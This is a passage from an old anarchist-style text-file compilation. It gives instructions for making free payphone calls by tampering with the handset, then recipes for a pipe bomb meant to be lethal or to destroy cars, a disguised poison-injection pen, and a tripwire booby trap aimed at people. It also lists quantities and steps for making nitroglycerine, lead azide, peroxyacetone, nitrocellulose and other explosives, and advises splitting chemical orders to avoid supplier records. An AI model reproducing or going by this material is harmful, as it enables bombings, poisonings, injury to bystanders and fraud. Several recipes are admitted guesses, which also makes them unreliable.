  3565.    ring, so the caps should be rated at 100VDC+.
  3566. 3) I ended up with a final series resistance value (100 ohm + pot) of 2.75K.
  3567.    I speculate that one could probably use 2MFD and a fixed 2.7K resistor and
  3568.    do the job 90% of the time. The adjustment of the pot is not very critical.
  3569.    Changes of +/- 1K made little difference in the performance of the circuit.
  3570.  
  3571. Hope it works as well for you as it did for me.
  3572.  
  3573. Mike McCauley
  3574.  
  3575.  
  3576.   _7+3 _             How to "steal" local calls from most Payphones
  3577.  
  3578.      Now to make free local calls, you need a  finishing nail.  We highly
  3579. recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
  3580. inch  in diameter and 2 inches long (of course).  You also need  a  large
  3581. size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
  3582. (FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
  3583. piece  and  moving  it out 90 degrees.  When it is done  it  should  look
  3584. somewhat like this:
  3585.                  /----------\
  3586.                  :          :
  3587.                  :          :
  3588.                  :          :
  3589.                  :          :
  3590.                  \-----
  3591.  
  3592.      Now,  on to the neat stuff.  What you do,  instead of unscrewing the
  3593. glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
  3594. mouthpiece  (where you talk) and push it in with pressure or just  hammer
  3595. it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
  3596. You  could  damage  it if you insert the nail too far or  at  some  weird
  3597. angle.  If  this happens then the other party won't be able to hear  what
  3598. you say.
  3599.      You now have a hole in the mouthpiece in which you can easily insert
  3600. the  paper clip.  So, take out the nail and put in the paper  clip.  Then
  3601. take  the other end of the paper clip and shove it under the rubber  cord
  3602. protector at the bottom of the handset (you know, the blue guy...).  This
  3603. should end up looking remotely like...like this:
  3604.  
  3605.                  /----------\      Mouthpiece
  3606.                  :          :      /
  3607.          Paper clip -->  :          :     /
  3608.                  :      /---:---\
  3609.                  :      :   :   :------------>
  3610.      ====================\---))):       :  To earpiece ->
  3611.            ^              ^ \-------------------->
  3612.            :              :
  3613.            :              :
  3614.          Cord          Blue guy
  3615.  
  3616. (The  paper clip is shoved under the blue guy to make a  good  connection
  3617. between the inside of the mouthpiece and the metal cord.)
  3618.  
  3619.      Now,  dial  the number of a local number you wish to  call,  sayyyy,
  3620. MCI.  If  everything  goes okay, it should ring and not answer  with  the
  3621. "The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
  3622. other  end  answers  the phone, remove the  paper  clip.  It's  all  that
  3623. simple, see?
  3624.  
  3625.      There  are  a couple problems,  however.  One  is,  as  we mentioned
  3626. earlier, the mouthpiece not working after you punch it.  If this  happens
  3627. to you,  simply move on to the next payphone.  The one you are now on  is
  3628. lost.  Another problem is that the touch tones won't work when the  paper
  3629. clip is in the mouthpiece. There are two ways around this..
  3630.      A> Dial the first 6 numbers.  This should be done without the  paper  _7+3 _clip making the connection, i.e., one side should not be connected.  Then
  3631. connect  the paper clip,  hold down the last digit,  and slowly pull  the
  3632. paper clip out at the mouthpiece's end.
  3633.      B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
  3634. punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
  3635. the nail head to the plate on the main body of the phone,  the money safe
  3636. thingy..then press the last number.
  3637.  
  3638.      The  reason  that this method is sometimes called  clear  boxing  is
  3639. because  there is another type of phone which lets you actually make  the
  3640. call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
  3641. mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
  3642. amplify your voice signals and send it through the earpiece.  If you  see
  3643. how  this  is even slightly similar to the method we  just  described  up
  3644. there, kindly explain it to US!! Cause WE don't GET IT!
  3645.  
  3646.      Anyways,  this DOES work on almost all single slot,  Dial Tone First
  3647. payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
  3648. least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
  3649. are other Phreaks like you out there who have read this article and punch
  3650. payphones, so look before you punch, and save time.
  3651.  
  3652.  
  3653.  
  3654.  
  3655.  
  3656.            - HOW TO MAKE A POWERFUL PIPE BOMB -
  3657.  
  3658.  
  3659.     This pipe bomb is extremely powerful and should be used with extreme
  3660. caution.  This bomb is very nice and EXTREMELY powerful, though.  It packs
  3661. quite a punch, especially nestled on someone's engine block.
  3662.  
  3663. Ingredients:
  3664.  
  3665.     1.  A PVC pipe.  The longer, the more powerful.  I recommend about 5
  3666.         inches.
  3667.  
  3668.     2.  Two ends, preferably brass.  These are the things that screw on to
  3669.         the end of the pipe.
  3670.  
  3671.     3.  Black powder - gun powder.
  3672.  
  3673.     4.  A drill.
  3674.  
  3675.     5.  Cannon Fuse, 6+ inches long.
  3676.  
  3677.       * 6.  Iron bits and pieces.
  3678.  
  3679. * denotes optional.
  3680.  
  3681. Instructions:
  3682.  
  3683.  Use the drill to make a hole in the middle of the PVC pipe, a hole as big as
  3684.  the width of the fuse.  Put one end on one end of the pipe, tighten it nicely  _7+3 _ and then pour as much black powder in there as will fit.  Now securely fasten
  3685.  the other end on the other side and insert the fuse.  Place, light, and run!
  3686.  
  3687. Options:
  3688.  
  3689.  Bury the bomb about six inches underground and light.  I once did this and it
  3690.  sent debris 20 feet in every direction.
  3691.  Place on the engine block of car to destroy it.
  3692.  Try electric detonation with an electric match.
  3693.  Put iron bits in the black powder to make it lethal.
  3694.  
  3695. Remember:
  3696.  
  3697.  If this is used correctly it can be as powerful as a hand grenade.  Also,
  3698.  light this in the correct place or else it could make your life miserable.
  3699.  
  3700.  
  3701.                    Poison Pen
  3702.  
  3703. Need:    plastic retractable ball pt. pen
  3704.      1cc Tuberculin syringe (about .7cm diam. or 1/4in)
  3705.                 (needle:1cm or 3/8 in.  long)
  3706.      razor blades
  3707.      ruler
  3708.  
  3709.  
  3710. To make:
  3711.      Cut about 1/4 in. or .7cm off end of syringe tube.  Generally make the
  3712. tube streamlined.  Take insides out of pen.  Sheer off tip of pen until you can
  3713. push the syringe in with light pressure and have all the needle, but nothing
  3714. else, protruding from the tip.  Cut a mark in the syringe where pen meets
  3715. syringe.  Remove syringe. Screw the sides of the pen together.  Cut pen in two
  3716. at meeting place of two halves.  Take the moving parts of the pen ( the
  3717. 'clicker') out.  Cut off all protrusions (parts that look like the fins on a
  3718. rocket) Glue all parts together like they were originally.  That part will now
  3719. be called the clicker.  Cut the 'push' flat part off the top of the plunger.
  3720. Cut the plunger so it is about 3/8 in. from the top of the tube when inserted
  3721. all the way.  Whittle the tip of the plunger so it will fit loosely in the
  3722. clicker.  Plunger end first, GENTLY push the tube into the clip-on end of the
  3723. pen as far as it will go, with moderate pressure.  Mark the place where pen
  3724. meets tube.  Remove the tube, measure the distance between the two marks, and
  3725. cut that much off the end of the tube.  Cut and whittle the plunger again.
  3726. Place the clicker in the clip end.  Insert the plunger to about .4cc and gently
  3727. push into the clip end. You should be able to push the clicker and make the
  3728. plunger move all the way down to empty. If not, modify further.  Cut a piece of
  3729. plastic or paper about 2cm or 7/8in wide, big enough to wrap around the biggest
  3730. part of the pen.  Tape it so it forms a sheath or tube and paint to match the
  3731. pen, like a sheath to cover the gap between the ends when the pen is not armed.
  3732.  
  3733.  
  3734. To Arm:
  3735.      Remove the syringe parts and fill with about .4cc liquid (good poison
  3736. of course).  Push the plunger end in the clip end as far as it will go. Some
  3737. liquid should squirt out, which is okay, as long as there is .1-.2cc left.
  3738. Take the other end of the pen and push it over the syringe and into the sheath.  _7+3 _You should place it so the needle is almost extending out of the end, but not
  3739. quite.
  3740.  
  3741. To use:
  3742.      One-handed, holding with the clip on part (not touching the clicker),
  3743. slide the two ends together. The needle should slide out.  Stab, depress
  3744. clicker. The syringe should inject its poison.
  3745.  
  3746.  
  3747.                   Chemicals 1
  3748.  
  3749. I. Common "weak" explosives.
  3750.  
  3751.  A. Gunpowder:
  3752.      75% Potassium Nitrate
  3753.      15% Charcoal
  3754.      10% Sulfur
  3755.  
  3756.       The chemicals should be ground into a fine powder (seperately!) with a
  3757. morter & pestle. If gunpowder is ignited in the open, it burns fiercely, but if
  3758. in a closed space it builds up pressure from the released gases and can explode
  3759. the container. Gunpowder works like this: the potassium nitrate oxidizes the
  3760. charcoal and sulfur, which then burn fiercely. Carbon dioxide and sulfur
  3761. dioxide are the gases released.
  3762.  
  3763.  B. Ammonal:
  3764.      Ammonal is a mixture of ammonium nitrate (a strong oxidizer) with aluminum
  3765. powder (the 'fuel' in this case). I am not sure of the % composition for
  3766. Ammonal, so you may want to experiment a little using small amounts.
  3767.  
  3768.  C. Chemically ignited explosives:
  3769.  
  3770.   1. A mixture of 1 part potassium chlorate to 3 parts table sugar (sucrose)
  3771. burns fiercely and brightly (similar to the burning of magnesium) when 1 drop
  3772. of concentrated sulfuric acid is placed on it. What occurs is this: when the
  3773. acid is added it reacts with the potassium chlorate to form chlorine dioxide,
  3774. which explodes on formation, burning the sugar as well.
  3775.   2. Using various chemicals, I have developed a mixture that works very well
  3776. for imitating volcanic eruptions. I have given it the name 'MPG Volcanite'
  3777. (tm). Here it is: potassium chlorate +potassium perchlorate + ammonium nitrate
  3778. + ammonium dichromate + potassium nitrate + sugar + sulfur + iron filings +
  3779. charcoal + zinc dust + some coloring agent. (scarlet= strontium nitrate,
  3780. purple= iodine crystals, yellow= sodium chloride, crimson= calcium chloride,
  3781. etc...).
  3782.   3. So, do you think water puts out fires? In this one, it starts it. Mixture:
  3783. ammonium nitrate + ammonium chloride + iodine + zinc dust. When a drop or two
  3784. of water is added, the ammonium nitrate forms nitric acid which reacts with the
  3785. zinc to produce hydrogen and heat. The heat vaporizes the iodine (giving off
  3786. purple smoke) and the ammonium chloride (becomes purple when mixed with iodine
  3787. vapor). It also may ignite the hydrogen and begin burning.
  3788.      Ammonium nitrate: 8 grams
  3789.      Ammonium choride: 1 gram
  3790.      Zinc dust: 8 grams
  3791.      Iodine crystals: 1 gram
  3792.   4. Potassium permanganate + glycerine when mixed produces a purple-colored  _7+3 _flame in 30 secs-1 min. Works best if the potassium permanganate is finely
  3793. ground.
  3794.   5. Calcium carbide + water releases acetylene gas (highly flammable gas used
  3795. in blow torches...)
  3796.  
  3797. II. Thermite reaction.
  3798.  
  3799.   The Thermite reaction is used in welding, because it generates molten iron
  3800. and temperatures of 3500 C (6000F+). It uses one of the previous reactions that
  3801. I talked about to START it!
  3802.  
  3803.   Starter=potassium chlorate + sugar
  3804.   Main pt.= iron (III) oxide + aluminum powder (325 mesh or finer)
  3805.  
  3806.     Put the potassium chlorare + sugar around and on top of the main pt. To
  3807. start the reaction, place one drop of concentrated sulfuric acid on top of the
  3808. starter mixture. STEP BACK! The ratios are: 3 parts iron(III) oxide to 1 part
  3809. aluminum powder to 1 part potassium chlorate to 1 part sugar.
  3810.  When you first do it, try 3g:1g:1g:1g!
  3811.  Also, there is an alternative starter for the Thermite reaction. The
  3812. alternative is potassium permanganate + glycerine. Amounts: 55g iron(III)
  3813. oxide, 15g aluminum powder, 25g potassium permanganate, 6ml glycerine.
  3814.  
  3815. III. Nitrogen-containing high explosives.
  3816.  
  3817.   A. Mercury(II) Fulminate
  3818.       To produce Mercury(II) Fulminate, a very sensitive shock explosive, one
  3819. might assume that it could be formed by adding Fulminic acid to mercury. This
  3820. is somewhat difficult since Fulminic acid is very unstable and cannot be
  3821. purchased. I did some research and figured out a way to make it without
  3822. fulminic acid. You add 2 parts nitric acid to 2 parts alcohol to 1 part
  3823. mercury. This is theoretical (I have not yet tried it) so please, if you try
  3824. this, do it in very* small amounts and tell me the results.
  3825.  
  3826.   B. Nitrogen Triiodide
  3827.       Nitrogen Triiodide is a very powerful and very shock sensitive explosive.
  3828. Never store it and be carful when you're around it- sound, air movements, and
  3829. other tiny things could set it off.
  3830.  
  3831. Materials-
  3832.    2-3g Iodine
  3833.    15ml conc. ammonia
  3834.    8 sheets filter paper
  3835.    50ml beaker
  3836.    feather mounted on a two meter pole
  3837.    ear plugs
  3838.    tape
  3839.    spatula
  3840.    stirring rod
  3841.  
  3842.   Add 2-3g Iodine to 15ml ammonia in the 50ml beaker. Stir, let stand for 5
  3843. minutes.
  3844. DO THE FOLLOWING WITHIN 5 MINUTES!
  3845.    Retain the solid, decant the liquid (pour off the liquid but keep the brown
  3846. solid...). Scape the brown residue of Nitrogen Triiodide onto a stack of four  _7+3 _sheets of filter paper. Divide solid into four parts, putting each on a
  3847. seperate sheet of dry filter paper. Tape in position, leave to dry undisturbed
  3848. for AT LEAST 30 minutes (preferrably longer). To detonate, touch with feather.
  3849. (WEAR EAR PLUGS WHEN DETONATING OR COVER EARS- IT IS VERY LOUD!)
  3850.  
  3851.   C. Cellulose Nitrate (Guncotton)
  3852.  
  3853.        Commonly known as Smokeless powder, Nitrocellulose is exactly that- it
  3854. does not give off smoke when it burns.
  3855.  
  3856. Materials-
  3857.   70ml concentrated sulfuric acid
  3858.   30ml concentrated nitric acid
  3859.   5g absorbent cotton
  3860.   250ml 1M sodium bicarbonate
  3861.   250ml beaker
  3862.   ice bath
  3863.   tongs
  3864.   paper towels
  3865.  
  3866.    Place 250ml beaker in the ice bath, add 70ml sulfuric acid, 30 ml nitric
  3867. acid. Divide cotton into .7g pieces. With tongs, immerse each piece in the acid
  3868. solution for 1 minute. Next, rinse each piece in 3 successive baths of 500ml
  3869. water. Use fresh water for each piece. Then immerse in 250ml 1M sodium
  3870. bicarbonate. If it bubbles, rinse in water once more until no bubbling occurs.
  3871. Squeeze dry and spread on paper towels to dry overnight.
  3872.  
  3873.  
  3874.   D. Nitroglycerine
  3875.  
  3876.     Nitroglycerine is a *VERY* dangerous shock sensitive explosive. It is used
  3877. in making dynamite, among other things.
  3878.     I am not sure as to the proportions and amounts of chemicals to be used, so
  3879. I shall use estimates.
  3880.  
  3881. Materials-
  3882.   70ml conc. sulfuric acid
  3883.   30ml conc. nitric acid
  3884.   10 ml glycerine
  3885.   ice bath
  3886.   150ml beaker
  3887.  
  3888.    Put the 150ml beaker in the ice bath and make sure that it is very cold.
  3889. Slowly add the 70ml sulfuric and 30ml nitric acids to the beaker, trying to
  3890. maintain a low temperature. When the temperature starts to level off, add about
  3891. 10ml glycerine. If it turns brown or looks funny, **RUN LIKE HELL**. When
  3892. Nitroglycerine turns brown, that means it's ready to explode... If it stays
  3893. clear and all works well, keep the temperature as low as you can and let it sit
  3894. for a few hours. You then should have some Nitroglycerine, probably mixed with
  3895. nitric and sulfuric acids. When you set it off, you must not be nearby.
  3896. Nitroglycerine can fill 10,000 times its original area with expanding gases.
  3897. This means that if you have 10ml's of Nitroglycerine in there, it will produce
  3898. some 100,000ml's of gases.
  3899.    To make it into dynamite, the Nitroglycerine must be absorbed into something
  3900. like wood pulp or diamaeceous earth (spelled something like that).  _7+3 _
  3901.  
  3902. IV. Other stuff
  3903.  
  3904.   A. Peroxyacetone
  3905.  
  3906.    Peroxyacetone is extremely flammable and has been reported to be shock
  3907. sensitive.
  3908.  
  3909. Materials-
  3910.   4ml Acetone
  3911.   4ml 30% Hydrogen Peroxide
  3912.   4 drops conc. hydrochloric acid
  3913.   150mm test tube
  3914.  
  3915.  Add 4ml acetone and 4ml hydrogen peroxide to the test tube. Then add 4 drops
  3916. concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to
  3917. appear. If no change is observed, warm the test tube in a water bath at 40
  3918. celsius. Allow the reaction to continue for two hours. Swirl the slurry and
  3919. filter it. Leave out on filter paper to dry for at least two hours. To ignite,
  3920. light a candle tied to a meter stick and light it (while staying at least a
  3921. meter away).
  3922.  
  3923.   B. Smoke smoke smoke...
  3924.  
  3925.    The following reaction should produce a fair amount of smoke. Since this
  3926. reaction is not all that dangerous you can use larger amounts if necessary for
  3927. larger amounts of smoke.
  3928.  
  3929.    6g zinc powder
  3930.    1g sulfur powder
  3931.  
  3932.     Insert a red hot wire into the pile, step back. A lot of smoke should be
  3933. created.
  3934.  
  3935.  
  3936.  
  3937.                 Pyrotechnics #2
  3938.  
  3939.  
  3940.       Touch Paper, Self Igniting Mixtures, Percussion Explosives
  3941.  
  3942.  
  3943. Sodium Azide - NaN
  3944.           3
  3945. This white powder is very poisonous. It is also a bit unstable, so treat it
  3946. gently.
  3947.  
  3948. Lead Nitrate - Pb(NO )
  3949.             3 2
  3950. This contains poisonous lead and is very water soluble so your body will
  3951. absorb it quickly, given the chance. The government has banned leaded paints
  3952. and is phasing out leaded gasoline because the stuff slowly accumulates in
  3953. your body and can screw up all sorts of important innards. If you are careless
  3954. with Lead Nitrate you can do a few lifetimes' worth of damage in one  _7+3 _afternoon.
  3955.  
  3956. Ammonium Nitrate - NH NO
  3957.              4  3
  3958. Commonly used as fertilizer, this stuff is somewhat dangerous in large
  3959. quantities, particularly if it gets very hot. (Entire shiploads of this
  3960. material have been known to go up all at once.) When heated gently, it
  3961. decomposes into water and nitrous oxide (laughing gas). Farmers sometimes use
  3962. it to blow up tree stumps by mixing it with fuel oil and setting the gunk off
  3963. with a detonator. We'll have a very different use for it here.
  3964.  
  3965. Potassium Nitrate - KNO
  3966.                3
  3967. Also known as saltpeter, this is commercially used as a diuretic for animals.
  3968. It also works as an oxidizing agent in various pyrotechnic mixtures. That is,
  3969. when heated it provides the oxygen needed to make the rest of the mixture
  3970. burn.
  3971.  
  3972. Potassium   Potassium
  3973.  Nitrate     Nitrite   Oxygen
  3974.  
  3975.  2KNO   --->  2KNO    +  O
  3976.      3            2       2
  3977.  
  3978.  
  3979.  
  3980. Potassium Chlorate - KClO
  3981.              3
  3982. A much more spectacular oxidizing agent than Potassium Nitrate. It not only
  3983. yields more oxygen than Potassium Nitrate, it does so more easily. Pyrotechnic
  3984. mixtures containing this chemical will require much less of it, and yet burn
  3985. more fiercely. Even percussion can readily set the mixtures off. This can be
  3986. useful, but it sometimes makes the mixtures more sensitive than you'd like.
  3987. Mixtures containing this chemical must be handled carefully. Potassium
  3988. Chlorate is also poisonous.
  3989.  
  3990. Potassium     Potassium
  3991.  Chlorate      Chloride   Oxygen
  3992.  
  3993.   2KClO   --->   2KCl   +   3O
  3994.        3                      2
  3995.  
  3996.  
  3997. Aluminum Dust
  3998.  
  3999. Very finely divided aluminum. When put in a glass jar, it almost looks like a
  4000. solid piece of grey metal. In this form it is flammable. Also, it can
  4001. seriously damage your lungs if you inhale it. Be careful not to stir up any
  4002. clouds of dust, and it goes without saying that you shouldn't use it near an
  4003. open flame.
  4004.  
  4005. Zinc Dust
  4006.  
  4007. Very finely divided zinc. Not quite as flammable as Aluminum Dust, but still
  4008. worth handling carefully. Can also damage your lungs if inhaled.  _7+3 _
  4009. Lampblack
  4010.  
  4011. This is very finely divided carbon, usually obtained as a soot from other
  4012. manufacturing processes. It is much more effective in pyrotechnic mixtures
  4013. than powdered charcoal. Tiny spots of this are almost unnoticeable, but they
  4014. stick to your hands and smear incredibly far. If you're not very tidy you
  4015. should expect to find black smears all over your face and hands after using
  4016. this.
  4017.  
  4018. Sulfur
  4019.  
  4020. A yellow powder used as a reducing agent in many pyrotechnic mixtures. Buy
  4021. this in the finely powdered form. You can also get it in hard lumps, but these
  4022. will just waste extra time as you have to grind them yourself.
  4023.  
  4024. Potassium Permanganate
  4025.  
  4026. An oxidizing agent that's somewhat less vigorous than others mentioned here.
  4027. Not usually used in pyrotechnic mixtures because it's more expensive and less
  4028. effective than some of the alternatives. There are a few cases when it's just
  4029. the right thing. Don't let this accidentally come in contact with glycerine.
  4030. If such an accident happens, the resulting mess should be immediately wiped up
  4031. with wet paper towels and buried or flushed down a toilet. It should NOT be
  4032. thrown away in a dry waste receptacle!!!
  4033.  
  4034. Gum Arabic
  4035.  
  4036. A white powder which is mixed with water to make a glue like substance. Useful
  4037. for coating various mixtures or binding them together into a solid mass.
  4038.  
  4039. Sodium Peroxide
  4040.  
  4041. A very strange and dangerous oxidizer. Don't let it get wet and don't let it
  4042. touch your skin.
  4043.  
  4044. Glycerine
  4045.  
  4046. A thick liquid, chemically similar to rubbing alcohol. Though harder to get
  4047. burning, it will burn in the right circumstances. Fairly safe stuff.
  4048.  
  4049. Iodine Crystals
  4050.  
  4051. Pure Iodine is a steel grey solid, which is poisonous and which produses
  4052. poisonous vapors when heated. Smells similar to the chlorine used in bleaches
  4053. and swimming pools. If you accidentally should drop some on a hot surface and
  4054. notice the odor, you should leave the area.
  4055.  
  4056.  
  4057.  
  4058.                 Touch Paper
  4059.  
  4060.   This is an easily made material that acts like a slow burning fuse and is
  4061. ideal for testing small amounts of a pyrotechnic mixture. It is made by
  4062. soaking a piece of absorbent paper, like a paper towel, in a saturated  _7+3 _solution of Potassium Nitrate. (A saturated solution means that you have
  4063. dissolved as much of the chemical in water as is possible.) Hang the paper up
  4064. to dry, and be sure to wipe up any drips. When dry it is ready. Cut off a
  4065. small strip and light the edge to see how different it acts from ordinary
  4066. paper. This will ignite all but the most stubborn mixtures, and will ignite
  4067. gunpowder, which will in turn ignite most anything else.
  4068.  
  4069.   Don't dip the towel in the Potassium Nitrate solution a second time to try to
  4070. make it "stronger". This will actually make it less effective. Some of the
  4071. fancier paper towels don't work too well for this. Best results are obtained
  4072. from the cheap folded paper towels found in public restrooms everywhere.
  4073.  
  4074.  
  4075.                Self Igniting Mixtures
  4076.  
  4077.   Pulverize 1 gram of Potassium Permanganate crystals and place them on an
  4078. asbestos board or in an earthenware vessel. Let 2-3 drops of glycerine fall
  4079. onto the Potassium Permanganate. The mixture will eventually sizzle and then
  4080. flare. Potassium Permanganate is the oxidizing agent. The glycerine is
  4081. oxidized so quickly that heat is generated faster than it can be dissipated.
  4082. Consequently, the glycerine is ignited. Because this mixture takes so long to
  4083. catch on fire, it is sometimes useful when a time delay is needed to set off
  4084. some other mixture. If you lose patience with this test, DO NOT THROW THE
  4085. MIXTURE AWAY IN A WASTEBASKET!!! Either bury it or flush it down a toilet. I
  4086. know of at least one house fire that was started because this was not done.
  4087. Given time, this stuff WILL start to burn.
  4088.  
  4089.   This demonstration produces a very nice effect, but sends out a lot of
  4090. poisonous fumes, so do it outside. Make a mound of equal volumes of iodine
  4091. crystals and aluminum dust. Make a small indentation at the top of the mound
  4092. and add a drop or two of water and move away. It will hiss and burst into
  4093. flame, generating thick purple smoke. The fumes are Iodine vapor which is
  4094. very caustic, so make sure you are upwind of the fire. Since this is set off
  4095. by moisture, you should not store the mixed material. Mix it immediately
  4096. before you plan to use it.
  4097.  
  4098.   Shred a small piece of newspaper and place on it a small amount of sodium
  4099. peroxide. Add two drops of hot water. The paper will be ignited. CAUTION: Keep
  4100. Sodium Peroxide from moisture and out of contact with organic materials (your
  4101. skin, for example.)
  4102.  
  4103.   Ammonium Nitrate, 5 grams, 1 gram of Ammonium Chloride. Grind these
  4104. SEPARATELY, and add 1/4 gram of zinc dust. Form a cone and add 2-4 drops of
  4105. water. A bright blue flame with large volumes of smoke forms. Depending on the
  4106. quality of your zinc dust, you may need to increase the quantity of zinc.
  4107. Since this is ignited by moisture, you should not attempt to store this
  4108. mixture.
  4109.  
  4110.  
  4111.                Percussion Explosives
  4112.  
  4113.   This section will not only introduce a couple of mixtures with interesting
  4114. possibilities, but it will also demonstrate how sensitive mixtures containing
  4115. Potassium Chlorate can be. Keep in mind that Chlorate mixtures can be a LOT
  4116. more sensitive than the ones shown here.  _7+3 _
  4117.  
  4118.   Mix 1 part by weight of Sulfur, and 3 parts Potassium Chlorate. Each should
  4119. be ground separately in a mortar. They should be mixed lightly without any
  4120. pressure on a sheet of paper. A small amount of this mixture (less than one
  4121. gram!!) placed on a hard surface and struck with a hammer will explode with a
  4122. loud report.
  4123.  
  4124.   Mix the following parts by weight, the same way as above,
  4125.  
  4126.         Potassium Chlorate 6
  4127.         Lampblack          4
  4128.         Sulfur             1
  4129.  
  4130.   Both of these mixtures are flammable. Mix small quantities only.
  4131.  
  4132.  
  4133.  
  4134.                  Lead Azide  Pb(N )
  4135.                          3 2
  4136.  
  4137.   Unlike many explosives that must be enclosed in a casing to explode, and
  4138. others that require a detonator to set them off, Lead Azide will explode in
  4139. open air, either due to heat or percussion. Mixed with gum arabic glue, tiny
  4140. dots of it are placed under match heads to make trick exploding matches. The
  4141. same mixture coated onto 1/2 " wood splinters are used to "load" cigars. In
  4142. larger amounts, it is used as a detonator. A moderately light tap will set it
  4143. off, making it much more sensitive than the percussion explosives already
  4144. mentioned. It is very easy to make.
  4145.  
  4146.   Take about 1.3 grams of sodium azide and dissolve it in water. It's best not
  4147. to use any more water than necessary. In a separate container, dissolve about
  4148. 3.3 grams of Lead Nitrate, again only using as much water as needed to get it
  4149. to dissolve. When the two clear liquids are mixed, a white precipitate of Lead
  4150. Azide will settle out of the mixture. Add the Lead Nitrate solution, while
  4151. stirring, until no more Lead  Azide precipitates out. You may not need to use
  4152. it all. Note that the above weights are given only for your convenience if you
  4153. have the necessary scales, and give the approximate proportions needed. You
  4154. need only continue to mix the solutions until no more precipitate forms.
  4155.  
  4156.   The precipitate is filtered out and rinsed several times with distilled
  4157. water.  It is a good idea to store this in its wet form, as it is less
  4158. sensitive this way. It's best not to store it if possible, but if you do, you
  4159. should keep it in a flexible plastic container that wont produce sharp
  4160. fragments in case of an explosion. (NO MORE THAN A GRAM AT A TIME !!!!) Also,
  4161. make sure that the mouth of the container is wiped CLEAN before putting the lid
  4162. on. Just the shock of removing the lid is enough to set off the dry powder if
  4163. it is wedged between the container and the stopper. Don't forget that after
  4164. you've removed the precipitate from the filter paper, there will still be
  4165. enough left to make the filter paper explosive.
  4166.  
  4167.   Lead Azide is very powerful as well as very sensitive. Never make more than a
  4168. couple of grams at one time.
  4169.  
  4170.         Reaction Equations  _7+3 _
  4171. Lead        Sodium        Lead     Sodium
  4172. Nitrate      Azide       Azide    Nitrate
  4173.  
  4174. Pb(NO )   +  2NaN   ---> Pb(N )  + 2NaNO
  4175.      3 2         3           3 2        3
  4176.  
  4177.   Don't try to salvage the Sodium Nitrate that's left over (dissolved in the
  4178. water). Sodium nitrate is cheap, not really useful for good pyrotechnics, and
  4179. this batch will be contaminated with poisonous lead. It's worthless stuff.
  4180. Dump it out.
  4181.  
  4182.   To demonstrate the power of a little bit of Lead Azide, cut out a piece of
  4183. touch paper in the following shape
  4184.  
  4185.  
  4186.  
  4187. -----------------------------
  4188. !                            !
  4189. !                            !
  4190. !                             ---------------
  4191. !                                            !
  4192. !                             ---------------
  4193. !                            !
  4194. !                            !
  4195. -----------------------------
  4196.  
  4197.   Where the size of the wide rectangle is no more than one inch x 1/2 inch, and
  4198. the length of the little fuse is at least 3/4 inch. Apply a thin layer of wet
  4199. Lead Azide to the large rectangle with a paint brush and let it dry
  4200. thoroughly. When done, set this tester out in the open, light the fuse at the
  4201. very tip and step back. If done properly, the tiny bit of white powder will
  4202. produce a fairly loud explosion.
  4203.  
  4204.  
  4205.               A Lead Azide Booby Trap
  4206.  
  4207.   Get some string that's heavy enough so that it won't break when jerked hard.
  4208. A couple of feet is enough to test this out. You may want to use a longer piece
  4209. depending on what you plan to do with this. Fold a small "Z" shape in the
  4210. center of the string, as shown in figure 1. The middle section of the "Z"
  4211. should be about one inch long.
  4212.  
  4213.  
  4214. -------------------------------------.
  4215.                  .
  4216.            .
  4217.        .
  4218.        --------------------------------------------------
  4219.  
  4220.           Figure 1. Fold string into a small Z
  4221.  
  4222.   Next, twist the Z portion together as tightly as you can. Don't worry if it
  4223. unwinds a bit when you let go, but it should still stay twisted closely
  4224. together. If it doesn't, you will need a different kind of string. Figure 2  _7+3 _tries to show what this will look like.
  4225.  
  4226. -------------//////////////////-----------------
  4227.  
  4228.           Figure 2. Twist the Z portion tightly
  4229.  
  4230.   Next, apply some wet Lead Azide to the twisted portion with a paint brush.
  4231. The Lead Azide should have a bit of Gum Arabic in it to make it sticky. Cut
  4232. out a piece of paper, two inches by 6 inches long, wrap it around the twisted
  4233. portion, and glue the end on so that it stays put. You should now have a two
  4234. inch narrow paper tube with a string sticking out each end, as shown in figure
  4235. 3.
  4236.  
  4237.       -------------------------
  4238.       !                       !
  4239. ----------!                       !-------------------
  4240.       !                       !
  4241.       -------------------------
  4242.  
  4243.           Figure 3. The completed Booby Trap
  4244.  
  4245.   You should now set the booby trap aside for at least two weeks so that the
  4246. Lead Azide inside can dry completely. Don't try to speed up the process by
  4247. heating it. When the two ends of the string are jerked hard, the friction in
  4248. the wound up string will set off the Lead Azide. The booby trap can be
  4249. attatched to doors, strung out as tripwires, or set up in any other situation
  4250. that will cause a quick pull on the strings. Be careful not to use too much
  4251. Lead Azide. A little will go a long way. Before trying this on an unsuspecting
  4252. soul, make a test booby trap as explained here, tie one end to a long rope,
  4253. and set it off from a distance.
  4254.  
  4255.   The paper wound around the booby trap serves two purposes. It keeps the Lead
  4256. Azide from flaking off, and it pads the stuff so it will be less likely to get
  4257. set off accidentally. A good vigorous swat will still set it off though, so
  4258. store these separately and keep them padded well.
  4259.  
  4260.  
  4261.               Getting The Chemicals
  4262.  
  4263.   As always, be sure to use your brains when ordering chemicals from a lab
  4264. supply house. Those people KNOW what Sodium Azide and Lead Nitrate make when
  4265. mixed together. They also know that someone who orders a bunch of chlorates,
  4266. nitrates, metal dusts, sulfur, and the like, probably has mischeif in mind,
  4267. and they keep records. So break your orders up, order from different supply
  4268. houses, get some friends to order some of the materials, and try to order the
  4269. things long before you plan do do anything with them. It's a pain, and the
  4270. multiple orders cost a lot in extra shipping charges, but that's what it costs
  4271. to cover your tracks. DO it!
  4272.  
  4273.  
  4274.  
  4275.  
  4276.  
  4277.  
  4278.   _7+3 _                              Super Bottle Rockets
  4279.  
  4280.     Go down to a hobby shop and buy some Estes rocket engines and some small
  4281. dowels, you can make these babies.  Attach the dowel to the rocket casing with
  4282. tape or glue and be SURE to plug you the top end of the engine so you get a
  4283. bigger bang for your money.  Epoxy works well for this.  The great thing about
  4284. it is that they go VERY FAST and VERY FAR.  The speed is enough to knock out
